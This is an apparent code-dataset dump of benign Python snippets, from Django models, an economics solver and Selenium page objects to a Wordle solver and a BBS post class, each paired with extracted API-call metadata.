code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
---|---|---|
from socket import create_connection
from django.db import models
from django.utils import timezone
class Slave(models.Model):
def __str__(self):
return self.ip + str(self.port)
ip = models.GenericIPAddressField()
port = models.IntegerField()
busy = models.BooleanField(default=False)
def is_alive(self):
addr = (self.ip, self.port)
try:
con = create_connection(addr)
except:
return False
else:
con.sendall('Alive'.encode('utf-8'))
return True
def get_address(self):
return (self.ip, self.port)
def __enter__(self):
self.busy = True
self.save()
def __exit__(self, exc_type, exc_value, traceback):
self.busy = False
self.save()
class ContestControl(models.Model):
"Control for the contest"
def __str__(self):
return self.name
name = models.CharField(max_length=100, default='Contest')
start = models.DateTimeField(default=timezone.now)
end = models.DateTimeField(default=timezone.now)
|
[
"socket.create_connection",
"django.db.models.CharField",
"django.db.models.BooleanField",
"django.db.models.GenericIPAddressField",
"django.db.models.IntegerField",
"django.db.models.DateTimeField"
] |
[((202, 232), 'django.db.models.GenericIPAddressField', 'models.GenericIPAddressField', ([], {}), '()\n', (230, 232), False, 'from django.db import models\n'), ((244, 265), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (263, 265), False, 'from django.db import models\n'), ((277, 311), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (296, 311), False, 'from django.db import models\n'), ((922, 973), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'default': '"""Contest"""'}), "(max_length=100, default='Contest')\n", (938, 973), False, 'from django.db import models\n'), ((986, 1028), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (1006, 1028), False, 'from django.db import models\n'), ((1039, 1081), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (1059, 1081), False, 'from django.db import models\n'), ((404, 427), 'socket.create_connection', 'create_connection', (['addr'], {}), '(addr)\n', (421, 427), False, 'from socket import create_connection\n')]
|
import numpy as np
from numpy import vectorize
import scipy.optimize as so
@vectorize
def U(c, h, kappa, nu):
if c<=0:
u = -np.inf
elif c>0:
u = np.log(c) - (kappa*h**(1+1/nu))/((1+1/nu))
return u
class rep_ag:
def __init__(self, theta, beta, delta, kappa, nu, kmin, kmax, hmin, hmax, num_node=20, order=3):
self.theta = theta
self.beta = beta
self.delta = delta
self.kappa = kappa
self.nu = nu
self.kmin = kmin
self.kmax = kmax
self.hmin = hmin
self.hmax = hmax
self.num_node = num_node
self.order = order
##### creating the basis functions
func = []
Psi1 = np.vectorize(lambda x: 1)
Psi2 = np.vectorize(lambda x: x)
func.append(Psi1)
func.append(Psi2)
for i in range(2,order):
f = np.vectorize(lambda x, n=i: 2*x*func[n-1](x)-func[n-2](x))
func.append(f)
self.func = func
self.gridk, self.gridk_cheb = self.cheb_node(kmin, kmax, num_node, cheby=0)
PHI = []
for f in self.func:
phi = f(2*(self.gridk-self.kmin)/(self.kmax-self.kmin) -1)
PHI.append(phi)
self.PHI = np.array(PHI).T
def cheb_node(self, a, b, num, cheby=1):
vec = np.arange(0,num)
vec = np.flip(vec, axis=0)
chb = np.cos((vec*np.pi)/(num-1))
points = (a+b)/2 + ((b-a)/2)*chb
if cheby == 0:
vec_unit = 1/2 + (1/2)*chb
return np.array(points), np.array(vec_unit)
else:
return np.array(points)
def update_val(self, Theta_guess, ki, start): #Theta_guess here is just for a specific ki so we also need ki
Kp = lambda c, h: (1-self.delta)*ki + ki**(1-self.theta) *h**self.theta - c
Kp_cheb = lambda c, h: 2*(Kp(c,h)-self.kmin)/(self.kmax-self.kmin) -1 # here the value is function of kp not k so we need to map kp to (0,1) not k
Suma = lambda c, h: sum(Theta_guess[i]*self.func[i](Kp_cheb(c,h)) for i in range(len(self.func)))
VnotM = lambda x: -U(x[0], x[1], self.kappa, self.nu) - self.beta*Suma(x[0],x[1]) # - the objective because I am minimizing when I want to maximize
#non linear constraint
const = ({'type': 'ineq', 'fun': lambda x: ki**(1-self.theta)* x[1]**self.theta -x[0]})#higher or equal to zero
Boundc = (0.01*ki**(1-self.theta), None)
Boundh = (0.001*self.hmin,self.hmax)
Bound = (Boundc, Boundh)
res = so.minimize(VnotM, start, method = 'SLSQP', bounds = Bound, constraints=const)# start should be the solution found previously so we have interest in storing previous solution
# it should be an enequality not an upper_bound
Value = -res.fun
c_opt = res.x[0]
h_opt = res.x[1]
return Value, c_opt, h_opt
def update_theta(self, Theta_Old, Old_opt):
New_opt = []
V = []
for i in range(len(self.gridk)):
Value, c_opt, h_opt = self.update_val(Theta_Old, self.gridk[i], Old_opt[i,:]) #Old_opt is going to be a matrix containing the previews policy funtions
New_opt.append([c_opt, h_opt])
V.append(Value)
New_opt = np.array(New_opt)
V = np.array(V)
New_theta = np.linalg.inv([email protected])@self.PHI.T@V
return New_opt, New_theta
def problem(self, Old_theta = None, Tol = 10**(-6)):
if Old_theta == None:
Old_theta = np.zeros(len(self.func))
Old_c = (self.kmax/4)**(1-self.theta) *np.ones(len(self.gridk))
Old_h = (self.hmax/4)*np.ones(len(self.gridk))
Old_opt = np.vstack((Old_c,Old_h)).T
err = 1
j = 0
while err>Tol:
New_opt, New_theta = self.update_theta(Old_theta, Old_opt)
err = np.max(np.abs(Old_theta-New_theta))
if j%50 == 0:
print('iteration:', j)
print('error:', err)
Old_theta = New_theta
Old_opt = New_opt
j = j+1
self.New_opt = New_opt
self.New_theta = New_theta
return New_opt, New_theta
def Val_pol_fun(self):
kc = lambda k: 2*(k-self.kmin)/(self.kmax-self.kmin) -1
self.V = np.vectorize(lambda k: sum(self.New_theta[i]*self.func[i](kc(k)) for i in range(len(self.func))))
self.Theta_c = np.linalg.inv([email protected])@[email protected]_opt[:,0]
self.Theta_h = np.linalg.inv([email protected])@[email protected]_opt[:,1]
self.gc = np.vectorize(lambda k: sum(self.Theta_c[i]*self.func[i](kc(k)) for i in range(len(self.func))))
self.gh = np.vectorize(lambda k: sum(self.Theta_h[i]*self.func[i](kc(k)) for i in range(len(self.func))))
|
[
"scipy.optimize.minimize",
"numpy.vectorize",
"numpy.flip",
"numpy.log",
"numpy.abs",
"numpy.arange",
"numpy.array",
"numpy.cos",
"numpy.linalg.inv",
"numpy.vstack"
] |
[((732, 757), 'numpy.vectorize', 'np.vectorize', (['(lambda x: 1)'], {}), '(lambda x: 1)\n', (744, 757), True, 'import numpy as np\n'), ((774, 799), 'numpy.vectorize', 'np.vectorize', (['(lambda x: x)'], {}), '(lambda x: x)\n', (786, 799), True, 'import numpy as np\n'), ((1378, 1395), 'numpy.arange', 'np.arange', (['(0)', 'num'], {}), '(0, num)\n', (1387, 1395), True, 'import numpy as np\n'), ((1410, 1430), 'numpy.flip', 'np.flip', (['vec'], {'axis': '(0)'}), '(vec, axis=0)\n', (1417, 1430), True, 'import numpy as np\n'), ((1446, 1477), 'numpy.cos', 'np.cos', (['(vec * np.pi / (num - 1))'], {}), '(vec * np.pi / (num - 1))\n', (1452, 1477), True, 'import numpy as np\n'), ((2612, 2686), 'scipy.optimize.minimize', 'so.minimize', (['VnotM', 'start'], {'method': '"""SLSQP"""', 'bounds': 'Bound', 'constraints': 'const'}), "(VnotM, start, method='SLSQP', bounds=Bound, constraints=const)\n", (2623, 2686), True, 'import scipy.optimize as so\n'), ((3350, 3367), 'numpy.array', 'np.array', (['New_opt'], {}), '(New_opt)\n', (3358, 3367), True, 'import numpy as np\n'), ((3381, 3392), 'numpy.array', 'np.array', (['V'], {}), '(V)\n', (3389, 3392), True, 'import numpy as np\n'), ((1271, 1284), 'numpy.array', 'np.array', (['PHI'], {}), '(PHI)\n', (1279, 1284), True, 'import numpy as np\n'), ((1672, 1688), 'numpy.array', 'np.array', (['points'], {}), '(points)\n', (1680, 1688), True, 'import numpy as np\n'), ((179, 188), 'numpy.log', 'np.log', (['c'], {}), '(c)\n', (185, 188), True, 'import numpy as np\n'), ((1600, 1616), 'numpy.array', 'np.array', (['points'], {}), '(points)\n', (1608, 1616), True, 'import numpy as np\n'), ((1618, 1636), 'numpy.array', 'np.array', (['vec_unit'], {}), '(vec_unit)\n', (1626, 1636), True, 'import numpy as np\n'), ((3414, 3450), 'numpy.linalg.inv', 'np.linalg.inv', (['(self.PHI.T @ self.PHI)'], {}), '(self.PHI.T @ self.PHI)\n', (3427, 3450), True, 'import numpy as np\n'), ((3802, 3827), 'numpy.vstack', 'np.vstack', (['(Old_c, Old_h)'], {}), '((Old_c, Old_h))\n', (3811, 3827), True, 'import numpy as np\n'), ((3983, 4012), 'numpy.abs', 'np.abs', (['(Old_theta - New_theta)'], {}), '(Old_theta - New_theta)\n', (3989, 4012), True, 'import numpy as np\n'), ((4557, 4593), 'numpy.linalg.inv', 'np.linalg.inv', (['(self.PHI.T @ self.PHI)'], {}), '(self.PHI.T @ self.PHI)\n', (4570, 4593), True, 'import numpy as np\n'), ((4646, 4682), 'numpy.linalg.inv', 'np.linalg.inv', (['(self.PHI.T @ self.PHI)'], {}), '(self.PHI.T @ self.PHI)\n', (4659, 4682), True, 'import numpy as np\n')]
|
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from pathlib import Path
import unittest
from PIL import Image
from towhee import pipeline, _get_pipeline_cache, _PIPELINE_CACHE_ENV
from towhee.engine.engine import EngineConfig
CACHE_PATH = Path(__file__).parent.parent.resolve()
class TestPipeline(unittest.TestCase):
"""
Tests `pipeline` functionality.
"""
def setUp(self):
conf = EngineConfig()
conf.cache_path = CACHE_PATH
conf.sched_interval_ms = 20
def test_empty_input(self):
p = pipeline('test_util/simple_pipeline', cache=str(CACHE_PATH))
self.assertEqual(p(), [])
def test_simple_pipeline(self):
p = pipeline('test_util/simple_pipeline', cache=str(CACHE_PATH))
res = p(0)
self.assertEqual(res[0], 3)
def test_embedding_pipeline(self):
p = pipeline('test_util/resnet50_embedding',
cache=str(CACHE_PATH))
img_path = CACHE_PATH / 'data' / 'dataset' / 'kaggle_dataset_small' / \
'train' / '0021f9ceb3235effd7fcde7f7538ed62.jpg'
img = Image.open(str(img_path))
res = p(img)
self.assertEqual(res[0].size, 1000)
def test_simple_pipeline_multirow(self):
#pylint: disable=protected-access
p = pipeline('test_util/simple_pipeline', cache=str(CACHE_PATH))
p._pipeline.parallelism = 2
res = p(list(range(1000)))
for n in range(1000):
self.assertEqual(res[n], n+3)
class TestPipelineCache(unittest.TestCase):
def test_pipeline_cache(self):
self.assertEqual(_get_pipeline_cache(
None), Path.home() / '.towhee/pipelines')
os.environ[_PIPELINE_CACHE_ENV] = '/opt/.pipeline'
self.assertEqual(_get_pipeline_cache(
None), Path('/opt/.pipeline'))
self.assertEqual(_get_pipeline_cache(
'/home/mycache'), Path('/home/mycache'))
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"pathlib.Path.home",
"towhee.engine.engine.EngineConfig",
"towhee._get_pipeline_cache",
"pathlib.Path"
] |
[((2512, 2527), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2525, 2527), False, 'import unittest\n'), ((969, 983), 'towhee.engine.engine.EngineConfig', 'EngineConfig', ([], {}), '()\n', (981, 983), False, 'from towhee.engine.engine import EngineConfig\n'), ((2155, 2180), 'towhee._get_pipeline_cache', '_get_pipeline_cache', (['None'], {}), '(None)\n', (2174, 2180), False, 'from towhee import pipeline, _get_pipeline_cache, _PIPELINE_CACHE_ENV\n'), ((2315, 2340), 'towhee._get_pipeline_cache', '_get_pipeline_cache', (['None'], {}), '(None)\n', (2334, 2340), False, 'from towhee import pipeline, _get_pipeline_cache, _PIPELINE_CACHE_ENV\n'), ((2355, 2377), 'pathlib.Path', 'Path', (['"""/opt/.pipeline"""'], {}), "('/opt/.pipeline')\n", (2359, 2377), False, 'from pathlib import Path\n'), ((2405, 2441), 'towhee._get_pipeline_cache', '_get_pipeline_cache', (['"""/home/mycache"""'], {}), "('/home/mycache')\n", (2424, 2441), False, 'from towhee import pipeline, _get_pipeline_cache, _PIPELINE_CACHE_ENV\n'), ((2456, 2477), 'pathlib.Path', 'Path', (['"""/home/mycache"""'], {}), "('/home/mycache')\n", (2460, 2477), False, 'from pathlib import Path\n'), ((800, 814), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (804, 814), False, 'from pathlib import Path\n'), ((2195, 2206), 'pathlib.Path.home', 'Path.home', ([], {}), '()\n', (2204, 2206), False, 'from pathlib import Path\n')]
|
import tensorflow as tf
import platform
def os_info():
return {
'machine': platform.machine(),
'node': platform.node(),
'os': platform.platform(),
'cuda': tf.test.is_built_with_cuda()
}
|
[
"tensorflow.test.is_built_with_cuda",
"platform.machine",
"platform.node",
"platform.platform"
] |
[((88, 106), 'platform.machine', 'platform.machine', ([], {}), '()\n', (104, 106), False, 'import platform\n'), ((124, 139), 'platform.node', 'platform.node', ([], {}), '()\n', (137, 139), False, 'import platform\n'), ((155, 174), 'platform.platform', 'platform.platform', ([], {}), '()\n', (172, 174), False, 'import platform\n'), ((192, 220), 'tensorflow.test.is_built_with_cuda', 'tf.test.is_built_with_cuda', ([], {}), '()\n', (218, 220), True, 'import tensorflow as tf\n')]
|
import unittest
import nwcpp
class VariablesTestCase(unittest.TestCase):
def test_variable_declarations(self):
dag = nwcpp.Dataflow()
a = dag.declare_variable('a')
with self.assertRaises(RuntimeError):
# duplicate name
dag.declare_variable('a')
b = dag.declare_variable(name='b')
def test_variables_list(self):
dag = nwcpp.Dataflow()
c = dag.declare_variable('c')
b = dag.declare_variable('b')
a = dag.declare_variable('a')
self.assertEqual(dag.variables, [a, b, c])
def test_variable_lookup(self):
dag = nwcpp.Dataflow()
c = dag.declare_variable('c')
b = dag.declare_variable('b')
a = dag.declare_variable('a')
self.assertIsNone(dag.lookup_variable(name='B'))
self.assertIsNone(dag.lookup_variable(name='aa'))
for v in dag.variables:
self.assertEqual(dag.lookup_variable(name=v.name), v)
class OperationsTestCase(unittest.TestCase):
def test_mixing_dags(self):
dag_1 = nwcpp.Dataflow()
dag_2 = nwcpp.Dataflow()
a_1 = dag_1.declare_variable('a')
a_2 = dag_2.declare_variable('a')
sum_1 = dag_1.create_binary_op('+', a_1, a_1)
sum_2 = dag_2.create_binary_op('+', a_2, a_2)
with self.assertRaises(RuntimeError):
dag_1.create_binary_op('+', a_1, a_2)
with self.assertRaises(RuntimeError):
dag_2.create_binary_op('+', a_1, a_2)
with self.assertRaises(RuntimeError):
dag_1.create_binary_op('+', sum_1, sum_2)
with self.assertRaises(RuntimeError):
dag_2.create_binary_op('+', sum_1, sum_2)
def test_binary_operations(self):
dag = nwcpp.Dataflow()
a = dag.declare_variable('a')
b = dag.declare_variable('b')
# test all supported forms
div_1 = dag.create_binary_op('/', a, b)
div_2 = dag.div(a, b)
div_3 = a / b
with self.assertRaises(RuntimeError):
div_1.eval()
a.assign(8)
b.assign(4)
self.assertEqual(div_1.eval(), 2)
self.assertEqual(div_2.eval(), 2)
self.assertEqual(div_3.eval(), 2)
def test_operator_overloading(self):
dag = nwcpp.Dataflow()
a = dag.declare_variable('a')
b = dag.declare_variable('b')
c = dag.declare_variable('c')
result = a + b * c
a.assign(1)
b.assign(2)
c.assign(3)
self.assertEqual(result.eval(), 7)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"nwcpp.Dataflow"
] |
[((2571, 2586), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2584, 2586), False, 'import unittest\n'), ((132, 148), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (146, 148), False, 'import nwcpp\n'), ((393, 409), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (407, 409), False, 'import nwcpp\n'), ((626, 642), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (640, 642), False, 'import nwcpp\n'), ((1065, 1081), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (1079, 1081), False, 'import nwcpp\n'), ((1098, 1114), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (1112, 1114), False, 'import nwcpp\n'), ((1752, 1768), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (1766, 1768), False, 'import nwcpp\n'), ((2277, 2293), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (2291, 2293), False, 'import nwcpp\n')]
|
### tf-nightly-2.2.0.dev20200418
import tensorflow as tf
# Weight Quantization - Input/Output=float32
converter = tf.lite.TFLiteConverter.from_saved_model('./saved_model')
converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS,tf.lite.OpsSet.SELECT_TF_OPS]
tflite_quant_model = converter.convert()
with open('yolov3_nano_voc_416_weight_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Weight Quantization complete! - yolov3_nano_voc_416_weight_quant.tflite")
|
[
"tensorflow.lite.TFLiteConverter.from_saved_model"
] |
[((116, 173), 'tensorflow.lite.TFLiteConverter.from_saved_model', 'tf.lite.TFLiteConverter.from_saved_model', (['"""./saved_model"""'], {}), "('./saved_model')\n", (156, 173), True, 'import tensorflow as tf\n')]
|
# vim: expandtab tabstop=4 shiftwidth=4
from numpy import ndarray
import matplotlib.pyplot as plt
def plot_complex(*args, **kwargs):
'''
Plots complex data in the complex plane.
Parameters
----------
args: array_like
The complex arrays to plot
kwargs: dict
Parameters passed through to plt.Figure.scatter().
'''
plotargs = []
for arg in args:
if type(arg) is ndarray:
plotargs.append(arg.real)
plotargs.append(arg.imag)
else:
plotargs.append(arg)
plt.plot(*plotargs, **kwargs)
def plotc(*args, **kwargs):
'''
An alias of plot_complex().
'''
return plot_complex(*args, **kwargs)
|
[
"matplotlib.pyplot.plot"
] |
[((562, 591), 'matplotlib.pyplot.plot', 'plt.plot', (['*plotargs'], {}), '(*plotargs, **kwargs)\n', (570, 591), True, 'import matplotlib.pyplot as plt\n')]
|
"""Implements sauce lab login checkout first step."""
from enum import Enum
from selenium.webdriver.remote.webdriver import WebDriver
from module_06.src.elements.base_page_element import BasePageElement
from module_06.src.elements.header import Header
from module_06.src.elements.inventory_items import InventoryItems
from module_06.src.elements.select_element import SelectElement
from module_06.src.locators.inventory import InventoryPageLoc
from module_06.src.locators.cart import CartItemLoc
from module_06.src.locators.checkout import CheckoutItemLoc
from module_06.src.pages.base_page import BasePage
from module_06.src.mixin.InventoryItemMixin import InventoryItemMixin
from module_06.src.locators.inventory_details import InventoryDetailsLoc
from module_06.src.elements.checkout_info import ContactCheckout
from module_06.src.pages.cart import CartPage
_URL = 'https://www.saucedemo.com/checkout-step-one.html'
class CheckoutFirstStep(InventoryItemMixin, BasePage):
def __init__(self, driver: WebDriver, timeout: int = 5):
super().__init__(driver, _URL, timeout)
self._info_checkout = ContactCheckout(self._wait)
self.header = Header(self._wait)
def fill_info(self, firstname="", lastname="", postal_code=""):
self._info_checkout.fill_info(firstname, lastname, postal_code)
def checkout(self):
self._info_checkout.checkout()
return CartPage(self._wait._driver, self._wait._timeout)
def back_to_cart(self):
self._info_checkout.back_to_cart()
def get_error_msg(self):
return self._info_checkout.get_error_msg()
|
[
"module_06.src.elements.checkout_info.ContactCheckout",
"module_06.src.pages.cart.CartPage",
"module_06.src.elements.header.Header"
] |
[((1117, 1144), 'module_06.src.elements.checkout_info.ContactCheckout', 'ContactCheckout', (['self._wait'], {}), '(self._wait)\n', (1132, 1144), False, 'from module_06.src.elements.checkout_info import ContactCheckout\n'), ((1167, 1185), 'module_06.src.elements.header.Header', 'Header', (['self._wait'], {}), '(self._wait)\n', (1173, 1185), False, 'from module_06.src.elements.header import Header\n'), ((1406, 1455), 'module_06.src.pages.cart.CartPage', 'CartPage', (['self._wait._driver', 'self._wait._timeout'], {}), '(self._wait._driver, self._wait._timeout)\n', (1414, 1455), False, 'from module_06.src.pages.cart import CartPage\n')]
|
#!/usr/bin/env python
"""Author: <NAME>"""
import math
import cgi
from pyiem.util import ssw
def createCircleAroundWithRadius(lat, lon, radiusMiles):
"""Create circle."""
latArray = []
lonArray = []
for brng in range(0, 360):
lat2, lon2 = getLocation(lat, lon, brng, radiusMiles)
latArray.append(lat2)
lonArray.append(lon2)
return lonArray, latArray
def getLocation(lat1, lon1, brng, distanceMiles):
"""getLocation."""
lat1 = lat1 * math.pi / 180.0
lon1 = lon1 * math.pi / 180.0
# earth radius - If ever needed to be in km vs. miles, change R
R = 3959
distanceMiles = distanceMiles/R
brng = (brng / 90) * math.pi / 2
lat2 = (
math.asin(
math.sin(lat1) * math.cos(distanceMiles) + math.cos(lat1) *
math.sin(distanceMiles) * math.cos(brng))
)
lon2 = (
lon1 + math.atan2(
math.sin(brng) * math.sin(distanceMiles) * math.cos(lat1),
math.cos(distanceMiles) - math.sin(lat1) * math.sin(lat2))
)
lon2 = 180.0 * lon2 / math.pi
lat2 = 180.0 * lat2 / math.pi
return lat2, lon2
def main():
"""Go Main Go."""
form = cgi.FieldStorage()
ssw("Content-type: application/octet-stream\n")
ssw(('Content-Disposition: attachment; filename=placefile_rings.txt\n\n'))
# Things for the user to theoretically input:
loc = form.getfirst("loc", "Jack Trice Stadium")
pointLat = float(form.getfirst("lat", 42.014004))
pointLon = float(form.getfirst("lon", -93.635773))
ssw((
"; This is a placefile to draw a range ring x miles from: %s\n"
"; Created by <NAME> - 8/9/2019\n"
"; Code adapted from <NAME> (2016)\n\n\n"
"Threshold: 999 \n"
"Title: Rings @ %s\n"
) % (loc, loc))
for i in range(3):
distanceInMiles = float(form.getfirst("m%s" % (i, ), 100))
if distanceInMiles <= 0.00001:
continue
r = int(form.getfirst('r%s' % (i, ), 255))
g = int(form.getfirst('g%s' % (i, ), 255))
b = int(form.getfirst('b%s' % (i, ), 0))
a = int(form.getfirst('a%s' % (i, ), 255))
# Create the lon/lat pairs
X, Y = createCircleAroundWithRadius(
pointLat, pointLon, distanceInMiles)
ssw((
"Color: %s %s %s %s\n"
"Line: 2, 0, \"%.1f miles from %s\" \n"
) % (r, g, b, a, distanceInMiles, loc))
for x, y in zip(X, Y):
ssw(" %s, %s\n" % (y, x))
ssw("End:\n\n")
if __name__ == '__main__':
main()
|
[
"pyiem.util.ssw",
"cgi.FieldStorage",
"math.cos",
"math.sin"
] |
[((1189, 1207), 'cgi.FieldStorage', 'cgi.FieldStorage', ([], {}), '()\n', (1205, 1207), False, 'import cgi\n'), ((1212, 1259), 'pyiem.util.ssw', 'ssw', (['"""Content-type: application/octet-stream\n"""'], {}), "('Content-type: application/octet-stream\\n')\n", (1215, 1259), False, 'from pyiem.util import ssw\n'), ((1264, 1336), 'pyiem.util.ssw', 'ssw', (['"""Content-Disposition: attachment; filename=placefile_rings.txt\n\n"""'], {}), "('Content-Disposition: attachment; filename=placefile_rings.txt\\n\\n')\n", (1267, 1336), False, 'from pyiem.util import ssw\n'), ((1556, 1751), 'pyiem.util.ssw', 'ssw', (['("""; This is a placefile to draw a range ring x miles from: %s\n; Created by <NAME> - 8/9/2019\n; Code adapted from <NAME> (2016)\n\n\nThreshold: 999 \nTitle: Rings @ %s\n"""\n % (loc, loc))'], {}), '(\n """; This is a placefile to draw a range ring x miles from: %s\n; Created by <NAME> - 8/9/2019\n; Code adapted from <NAME> (2016)\n\n\nThreshold: 999 \nTitle: Rings @ %s\n"""\n % (loc, loc))\n', (1559, 1751), False, 'from pyiem.util import ssw\n'), ((2301, 2406), 'pyiem.util.ssw', 'ssw', (['("""Color: %s %s %s %s\nLine: 2, 0, "%.1f miles from %s" \n""" % (r, g, b, a,\n distanceInMiles, loc))'], {}), '("""Color: %s %s %s %s\nLine: 2, 0, "%.1f miles from %s" \n""" % (r, g, b,\n a, distanceInMiles, loc))\n', (2304, 2406), False, 'from pyiem.util import ssw\n'), ((2523, 2538), 'pyiem.util.ssw', 'ssw', (['"""End:\n\n"""'], {}), "('End:\\n\\n')\n", (2526, 2538), False, 'from pyiem.util import ssw\n'), ((2489, 2514), 'pyiem.util.ssw', 'ssw', (["(' %s, %s\\n' % (y, x))"], {}), "(' %s, %s\\n' % (y, x))\n", (2492, 2514), False, 'from pyiem.util import ssw\n'), ((743, 757), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\n', (751, 757), False, 'import math\n'), ((760, 783), 'math.cos', 'math.cos', (['distanceMiles'], {}), '(distanceMiles)\n', (768, 783), False, 'import math\n'), ((841, 855), 'math.cos', 'math.cos', (['brng'], {}), '(brng)\n', (849, 855), False, 'import math\n'), ((958, 972), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\n', (966, 972), False, 'import math\n'), ((986, 1009), 'math.cos', 'math.cos', (['distanceMiles'], {}), '(distanceMiles)\n', (994, 1009), False, 'import math\n'), ((786, 800), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\n', (794, 800), False, 'import math\n'), ((815, 838), 'math.sin', 'math.sin', (['distanceMiles'], {}), '(distanceMiles)\n', (823, 838), False, 'import math\n'), ((915, 929), 'math.sin', 'math.sin', (['brng'], {}), '(brng)\n', (923, 929), False, 'import math\n'), ((932, 955), 'math.sin', 'math.sin', (['distanceMiles'], {}), '(distanceMiles)\n', (940, 955), False, 'import math\n'), ((1012, 1026), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\n', (1020, 1026), False, 'import math\n'), ((1029, 1043), 'math.sin', 'math.sin', (['lat2'], {}), '(lat2)\n', (1037, 1043), False, 'import math\n')]
|
from random import randint as rint
from sys import stderr, exit
wordlist = []
GREEN, YELLOW, GRAY = ('0', '1', '2')
def info():
"""
Wordle Game Solver
https://www.nytimes.com/games/wordle/index.html
Created by Leo (<NAME>), 2022
Any suggestion is welcome!
Check my code at https://github.com/LeoTheBestCoder/wordle-solver
"""
return
def showrule():
print('========================================================================')
print('If the result is GREEN, enter 0')
print('If the result is YELLOW, enter 1')
print('If the result is GRAY, enter 2')
print('Only a string with length = 5 and contains ONLY 0, 1, 2 is ACCEPTED!')
print('ex. Enter 12200 if the result is "yellow gray gray green green".')
print('========================================================================')
input('\nReady to start? (Press ENTER to continue)')
def getword():
idx = rint(0, len(wordlist) - 1)
return wordlist[idx]
def readfile():
global wordlist
with open('wordlist.txt', 'r') as fh:
wordlist = list(map(lambda w: w[:-1] if w[-1] == '\n' else w, fh.readlines()))
def check_r(res: str) -> bool:
if len(res) != 5:
return False
for ch in res:
if ch not in ['0', '1', '2']:
return False
return True
def update(word: str, res: str):
global wordlist
try:
assert check_r(res)
if res != '00000':
wordlist.remove(word)
for i in range(5):
invalid = []
if res[i] == GREEN:
# correct character + correct position
for w in wordlist:
if w[i] != word[i]:
invalid.append(w)
elif res[i] == YELLOW:
# correct character + wrong position
for w in wordlist:
if word[i] not in w:
invalid.append(w)
elif w[i] == word[i]:
invalid.append(w)
elif res[i] == GRAY:
# wrong character
for w in wordlist:
if word[i] in w:
special_case = False
for j in range(5):
if i != j and word[i] == word[j] and res[j] in [GREEN, YELLOW]:
special_case = True
if not special_case:
invalid.append(w)
# else:
# print(f'{w} is a special case')
for i_word in invalid:
wordlist.remove(i_word)
except:
stderr.write('Invalid result!\n')
exit(-1)
def run():
print(info.__doc__)
readfile()
showrule()
word = getword()
while len(set(word)) != 5:
word = getword()
print(f'Try to guess "{word}". What is the result? ', end = '')
res = input()
update(word, res)
# print(f'len = {len(wordlist)}')
# print(wordlist)
while res != '00000':
word = getword()
print(f'Try to guess "{word}". What is the result? ', end = '')
res = input()
update(word, res)
# print(f'len = {len(wordlist)}')
# print(wordlist)
print('Congratulations!')
if __name__ == '__main__':
run()
|
[
"sys.stderr.write",
"sys.exit"
] |
[((2750, 2783), 'sys.stderr.write', 'stderr.write', (['"""Invalid result!\n"""'], {}), "('Invalid result!\\n')\n", (2762, 2783), False, 'from sys import stderr, exit\n'), ((2792, 2800), 'sys.exit', 'exit', (['(-1)'], {}), '(-1)\n', (2796, 2800), False, 'from sys import stderr, exit\n')]
|
import pandas as pd
from .ols_estimator import OLSEstimator
ols = OLSEstimator(pd.read_csv("./data/listings_summary.csv"))
ols.clean_data()
ols.calculate_models()
ols.output_latex()
|
[
"pandas.read_csv"
] |
[((81, 123), 'pandas.read_csv', 'pd.read_csv', (['"""./data/listings_summary.csv"""'], {}), "('./data/listings_summary.csv')\n", (92, 123), True, 'import pandas as pd\n')]
|
import dataparser as dp
import sqlite3
import os.path
import re
from datetime import date
'''
{
"boardName1":{
"post1_SN":[SN,board,title,author,date,content]
"post2_SN":[SN,board,title,author,date,content]
}
"boardName2":{
"post1_SN":[SN,board,title,author,date,content]
}
......
}
'''
class Post():
counter = 0
def __init__(self,board,title,author,date,content,available=True):
if (available==True):
Post.counter += 1
self.SN=Post.counter
self.board=board
self.title=title
self.author=author
self.date=date
self.content=content
self.comments=""
self.available=available
def read(self):
c = self.content.split('<br>')
msg = f"Author: {self.author}\nTitlte: {self.title}\nDate: {self.date}\n--\n"
for comp in c:
msg = msg + comp + '\n'
msg = msg + '--' + self.comments
return msg
def update(self,ntype,new):
if(ntype=="title"): self.title=new
if(ntype=="content"): self.content=new
def comment(self,user,comm):
self.comments += f'\n{user}: {comm}'
def emptypost():
return Post(0,0,0,0,0,False)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
db_path = os.path.join(BASE_DIR, 'userinf.db')
posts=[emptypost()]
Chatrooms={}
def make_jsend(command,data):
